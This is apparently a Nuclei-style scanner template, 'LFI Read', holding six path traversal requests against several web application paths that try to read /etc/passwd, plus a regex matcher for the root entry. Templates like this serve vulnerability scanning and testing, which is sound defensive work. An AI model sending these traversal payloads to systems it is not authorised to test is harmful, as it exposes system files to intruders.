id: LFI

info:
  name: LFI Read
  author: Excis3
  severity: high
  tags: lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/appdata/theme/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
      - "{{BaseURL}}/appdata/theme/_default/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
      - "{{BaseURL}}/appdata/assets_cache/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
      - "{{BaseURL}}/css///..//..//..//..//..//..//..//..//..//..//../etc/passwd"

    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

